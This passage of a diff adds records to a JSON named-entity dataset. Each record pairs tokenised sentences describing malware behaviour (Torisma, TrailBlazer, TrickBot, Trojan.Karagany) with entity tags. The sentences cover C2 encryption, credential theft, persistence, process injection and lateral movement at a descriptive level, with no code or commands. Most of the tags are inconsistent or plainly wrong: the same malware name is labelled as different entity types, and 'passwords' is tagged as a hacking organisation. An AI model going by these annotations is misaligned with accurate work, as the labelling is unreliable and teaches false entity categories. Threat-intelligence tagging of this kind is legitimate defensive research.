"B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "is", + "only", + "delivered", + "to", + "a", + "compromised", + "host", + "if", + "the", + "victim's", + "IP", + "address", + "is", + "on", + "an", + "allow-list." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "can", + "send", + "victim", + "data", + "to", + "an", + "actor-controlled", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "has", + "used", + "various", + "Windows", + "API", + "calls." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "has", + "been", + "packed", + "with", + "Iz4", + "compression." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "has", + "encoded", + "C2", + "communications", + "with", + "Base64." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "has", + "encrypted", + "its", + "C2", + "communications", + "using", + "XOR", + "and", + "VEST-32." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Torisma", + "can", + "use", + "`GetlogicalDrives`", + "to", + "get", + "a", + "bitmask", + "of", + "all", + "drives", + "available", + "on", + "a", + "compromised", + "system.", + "It", + "can", + "also", + "use", + "`GetDriveType`", + "to", + "determine", + "if", + "a", + "new", + "drive", + "is", + "a", + "CD-ROM", + "drive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "can", + "collect", + "the", + "local", + "MAC", + "address", + "using", + "`GetAdaptersInfo`", + "as", + "well", + "as", + "the", + "system's", + "IP", + "address." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "can", + "use", + "`WTSEnumerateSessionsW`", + "to", + "monitor", + "remote", + "desktop", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "can", + "collect", + "the", + "current", + "time", + "on", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Torisma", + "can", + "use", + "HTTP", + "and", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrailBlazer", + "can", + "masquerade", + "its", + "C2", + "traffic", + "as", + "legitimate", + "Google", + "Notifications", + "HTTP", + "requests." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrailBlazer", + "has", + "used", + "random", + "identifier", + "strings", + "to", + "obscure", + "its", + "C2", + "operations", + "and", + "result", + "codes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrailBlazer", + "has", + "used", + "filenames", + "that", + "match", + "the", + "name", + "of", + "the", + "compromised", + "system", + "in", + "attempt", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrailBlazer", + "has", + "used", + "HTTP", + "requests", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrailBlazer", + "has", + "the", + "ability", + "to", + "use", + "WMI", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "implant", + "malicious", + "code", + "into", + "a", + "compromised", + "device's", + "firmware." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "uses", + "web", + "injects", + "and", + "browser", + "redirection", + "to", + "trick", + "the", + "user", + "into", + "providing", + "their", + "login", + "credentials", + "on", + "a", + "fake", + "or", + "modified", + "web", + "page." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "come", + "with", + "a", + "signed", + "downloader", + "component." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "used", + "COM", + "to", + "setup", + "scheduled", + "task", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "the", + "ability", + "to", + "capture", + "RDP", + "credentials", + "by", + "capturing", + "the", + "<code>CredEnumerateA</code>", + "API" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "uses", + "brute-force", + "attack", + "against", + "RDP", + "with", + "rdpscanDll", + "module." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Org", + "B-OffAct", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "obtain", + "passwords", + "stored", + "in", + "files", + "from", + "several", + "applications", + "such", + "as", + "Outlook,", + "Filezilla,", + "OpenSSH,", + "OpenVPN", + "and", + "WinSCP.", + "Additionally,", + "it", + "searches", + "for", + "the", + "\".vnc.lnk\"", + "affix", + "to", + "steal", + "VNC", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Purp", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "obtain", + "passwords", + "stored", + "in", + "files", + "from", + "web", + "browsers", + "such", + "as", + "Chrome,", + "Firefox,", + "Internet", + "Explorer,", + "and", + "Microsoft", + "Edge,", + "sometimes", + "using", + "esentutl." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "I-Tool", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "retrieved", + "PuTTY", + "credentials", + "by", + "querying", + "the", + "<code>Software\\SimonTatham\\Putty\\Sessions</code>", + "registry", + "key" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "collects", + "local", + "files", + "and", + "information", + "from", + "the", + "victim’s", + "local", + "machine." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "decodes", + "the", + "configuration", + "data", + "and", + "modules." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "disable", + "Windows", + "Defender." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "gather", + "information", + "about", + "domain", + "trusts", + "by", + "utilizing", + "Nltest." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "TrickBot", + "collects", + "email", + "addresses", + "from", + "Outlook." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "uses", + "an", + "AES", + "CBC", + "(256", + "bits)", + "encryption", + "algorithm", + "for", + "its", + "loader", + "and", + "configuration", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "send", + "information", + "about", + "the", + "compromised", + "host", + "and", + "upload", + "data", + "to", + "a", + "hardcoded", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "utilizes", + "EternalBlue", + "and", + "EternalRomance", + "exploits", + "for", + "lateral", + "movement", + "in", + "the", + "modules", + "wormwinDll,", + "wormDll,", + "mwormDll,", + "nwormDll,", + "tabDll." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "been", + "known", + "to", + "reach", + "a", + "command", + "and", + "control", + "server", + "via", + "one", + "of", + "nine", + "proxy", + "IP", + "addresses." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "use", + "secondary", + "C2", + "servers", + "for", + "communication", + "after", + "establishing", + "connectivity", + "and", + "relaying", + "victim", + "information", + "to", + "primary", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "searches", + "the", + "system", + "for", + "all", + "of", + "the", + "following", + "file", + "extensions:", + ".avi,", + ".mov,", + ".mkv,", + ".mpeg,", + ".mpeg4,", + ".mp4,", + ".mp3,", + ".wav,", + ".ogg,", + ".jpeg,", + ".jpg,", + ".png,", + ".bmp,", + ".gif,", + ".tiff,", + ".ico,", + ".xlsx,", + "and", + ".zip.", + "It", + "can", + "also", + "obtain", + "browsing", + "history,", + "cookies,", + "and", + "plug-in", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "B-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "TrickBot", + "module", + "\"Trickboot\"", + "can", + "write", + "or", + "erase", + "the", + "UEFI/BIOS", + "firmware", + "of", + "a", + "compromised", + "device." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "used", + "a", + "hidden", + "VNC", + "(hVNC)", + "window", + "to", + "monitor", + "the", + "victim", + "and", + "collect", + "information", + "stealthily." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "downloads", + "several", + "additional", + "files", + "and", + "saves", + "them", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "collects", + "the", + "users", + "of", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "attempted", + "to", + "get", + "users", + "to", + "launch", + "malicious", + "documents", + "to", + "deliver", + "its", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "TrickBot", + "downloader", + "has", + "used", + "an", + "icon", + "to", + "appear", + "as", + "a", + "Microsoft", + "Word", + "document." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "modify", + "registry", + "entries." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "uses", + "the", + "Windows", + "API", + "call,", + "CreateProcessW(),", + "to", + "manage", + "execution", + "flow.", + "TrickBot", + "has", + "also", + "used", + "<code>Nt*</code>", + "API", + "functions", + "to", + "perform", + "Process", + "Injection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "module", + "shareDll/mshareDll", + "discovers", + "network", + "shares", + "via", + "the", + "WNetOpenEnumA", + "API." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Some", + "TrickBot", + "samples", + "have", + "used", + "HTTP", + "over", + "ports", + "447", + "and", + "8082", + "for", + "C2.", + "Newer", + "versions", + "of", + "TrickBot", + "have", + "been", + "known", + "to", + "use", + "a", + "custom", + "communication", + "protocol", + "which", + "sends", + "the", + "data", + "unencrypted", + "over", + "port", + "443." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "uses", + "non-descriptive", + "names", + "to", + "hide", + "functionality." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "steal", + "passwords", + "from", + "the", + "KeePass", + "open", + "source", + "password", + "manager." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "identify", + "the", + "groups", + "the", + "user", + "on", + "a", + "compromised", + "host", + "belongs", + "to." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "been", + "known", + "to", + "use", + "PowerShell", + "to", + "download", + "new", + "payloads,", + "open", + "documents,", + "and", + "upload", + "data", + "to", + "command", + "and", + "control", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "I-Features", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "uses", + "module", + "networkDll", + "for", + "process", + "list", + "discovery." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Tool", + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "injects", + "into", + "the", + "svchost.exe", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "used", + "<code>Nt*</code>", + "Native", + "API", + "functions", + "to", + "inject", + "code", + "into", + "legitimate", + "processes", + "such", + "as", + "<code>wermgr.exe</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "TrickBot", + "establishes", + "persistence", + "in", + "the", + "Startup", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "uses", + "vncDll", + "module", + "to", + "remote", + "control", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "enumerate", + "computers", + "and", + "network", + "devices." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "creates", + "a", + "scheduled", + "task", + "on", + "the", + "system", + "that", + "provides", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "leverages", + "a", + "custom", + "packer", + "to", + "obfuscate", + "its", + "functionality." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "used", + "an", + "email", + "with", + "an", + "Excel", + "sheet", + "containing", + "a", + "malicious", + "macro", + "to", + "deploy", + "the", + "malware" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "been", + "delivered", + "via", + "malicious", + "links", + "in", + "phishing", + "e-mails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "Base64-encode", + "C2", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "uses", + "a", + "custom", + "crypter", + "leveraging", + "Microsoft’s", + "CryptoAPI", + "to", + "encrypt", + "C2", + "traffic.Newer", + "versions", + "of", + "TrickBot", + "have", + "been", + "known", + "to", + "use", + "`bcrypt`", + "to", + "encrypt", + "and", + "digitally", + "sign", + "responses", + "to", + "their", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "gathers", + "the", + "OS", + "version,", + "machine", + "name,", + "CPU", + "type,", + "amount", + "of", + "RAM", + "available,", + "and", + "UEFI/BIOS", + "firmware", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "obtains", + "the", + "IP", + "address,", + "location,", + "and", + "other", + "relevant", + "network", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "can", + "identify", + "the", + "user", + "and", + "groups", + "the", + "user", + "belongs", + "to", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "collects", + "a", + "list", + "of", + "install", + "programs", + "and", + "services", + "on", + "the", + "system’s", + "machine." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "used", + "<code>printf</code>", + "and", + "file", + "I/O", + "loops", + "to", + "delay", + "process", + "execution", + "as", + "part", + "of", + "API", + "hammering." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "used", + "a", + "VNC", + "module", + "to", + "monitor", + "the", + "victim", + "and", + "collect", + "information", + "to", + "pivot", + "to", + "valuable", + "systems", + "on", + "the", + "network" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "uses", + "HTTPS", + "to", + "communicate", + "with", + "its", + "C2", + "servers,", + "to", + "get", + "malware", + "updates,", + "modules", + "that", + "perform", + "most", + "of", + "the", + "malware", + "logic", + "and", + "various", + "configuration", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "has", + "used", + "macros", + "in", + "Excel", + "documents", + "to", + "download", + "and", + "deploy", + "the", + "malware", + "on", + "the", + "user’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "TrickBot", + "establishes", + "persistence", + "by", + "creating", + "an", + "autostart", + "service", + "that", + "allows", + "it", + "to", + "run", + "whenever", + "the", + "machine", + "boots." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "monitor", + "the", + "titles", + "of", + "open", + "windows", + "to", + "identify", + "specific", + "keywords." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "secure", + "C2", + "communications", + "with", + "SSL", + "and", + "TLS." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "steal", + "data", + "and", + "credentials", + "from", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "has", + "used", + "plugins", + "with", + "a", + "self-delete", + "capability." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "enumerate", + "files", + "and", + "directories", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "upload,", + "download,", + "and", + "execute", + "files", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "capture", + "keystrokes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "create", + "directories", + "to", + "store", + "plugin", + "output", + "and", + "stage", + "data", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "dump", + "passwords", + "and", + "save", + "them", + "into", + "<code>\\ProgramData\\Mail\\MailAg\\pwds.txt</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "base64", + "encode", + "and", + "AES-128-CBC", + "encrypt", + "data", + "prior", + "to", + "transmission." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "use", + "Tasklist", + "to", + "collect", + "a", + "list", + "of", + "running", + "tasks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "create", + "a", + "link", + "to", + "itself", + "in", + "the", + "Startup", + "folder", + "to", + "automatically", + "start", + "itself", + "upon", + "system", + "restart." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "take", + "a", + "desktop", + "screenshot", + "and", + "save", + "the", + "file", + "into", + "<code>\\ProgramData\\Mail\\MailAg\\shot.png</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "samples", + "sometimes", + "use", + "common", + "binary", + "packers", + "such", + "as", + "UPX", + "and", + "Aspack", + "on", + "top", + "of", + "a", + "custom", + "Delphi", + "binary", + "packer." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "detect", + "commonly", + "used", + "and", + "generic", + "virtualization", + "platforms", + "based", + "primarily", + "on", + "drivers", + "and", + "file", + "paths." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "capture", + "information", + "regarding", + "the", + "victim's", + "OS,", + "security,", + "and", + "hardware", + "configuration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "gather", + "information", + "on", + "the", + "network", + "configuration", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Trojan.Karagany", + "can", + "use", + "netstat", + "to", + "collect", + "a", + "list", + "of", + "network", + "connections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + 